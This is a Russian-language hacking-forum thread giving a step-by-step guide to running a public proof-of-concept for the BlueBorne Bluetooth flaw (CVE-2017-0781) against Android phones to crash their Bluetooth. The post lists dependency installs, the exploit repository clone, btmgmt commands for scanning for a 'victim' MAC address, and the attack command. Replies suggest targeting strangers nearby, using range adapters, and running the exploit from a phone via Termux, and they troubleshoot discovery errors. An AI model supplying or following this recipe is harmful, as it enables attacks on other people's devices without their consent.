Доброго времени суток. Опять пишу всякие "хацкерские" темы в ночное время суток( по МСК). Ладно, не суть. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn). Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера). UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS. Приступим! >Первым делом нам нужно установить зависимости скрипта. apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential Code apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential Затем обновляем модули python. pip install --upgrade pip pip install --upgrade pwntools Code pip install --upgrade pip pip install --upgrade pwntools Для работы с bluetooth с помощью python нам понадобится модуль pybluez. apt-get install bluetooth libbluetooth-dev pip install pybluez Code apt-get install bluetooth libbluetooth-dev pip install pybluez >Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом). git clone [URL]https://github.com/ojasookert/CVE-2017-0781[/URL] Code git clone [URL]https://github.com/ojasookert/CVE-2017-0781[/URL] >Дальше нам придётся попотеть...Т.к. проблема может быть следующая: Не работает bluetooth....Для этого используем утиллиту btmgmt. Запускаем её и делаем следующие шаги: btmgmt --index 0 power auto-power find Code btmgmt --index 0 power auto-power find Если начнется мониторинг Bluetooth устройств - значит всё готово. >Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt --index 0 и find). Как только нашли "жертву", вводим команду. python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.* Code python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.* И ждём. Мониторить устройство можете с других или же через консоль. #мояСТАТЬЯ!!!!!
а не легче просто включить блютузи начать конектится к пацану с колонкой (к его телефону а не к колонке) у него блютус должен збится
Ernesst_inactive198775, Ну вообще тема кликбейт. Использовать данную уязвимость можно и в более серьёзных делах...И вообще, где ты такое видел, что подключаясь к телефону человека, он автоматически дисконнектится от других девайсов? Я лично такое нигде не наблюдал, даже на старых телефонах с Java-ой.
Не обязательно стоять вблизи к нему. Можно использовать специальные адаптеры. К тому же если поработать головой, можно и утиллиту залить на телефон(дам подсказку - Termux).
retr0_inactive63222, Я написал, что надо поработать головой, а не тупо как даун-скрипкидди копировать-вставить в Termux....
Не работает на : btmgmt --index 0 power auto-power find после power пишет specify "on" or "off" потом пишу find и выдаёт это Unable to start discovery. status 0x11 (Invalid Index) Подскажи чё делать?
code_bit, Сейчас точно не смогу ответить, в ближайшие сутки распишу. Попробуй пока через другое устройство на базе android чекать, вроде mac-адреса показывает...Правда не у всех наверное.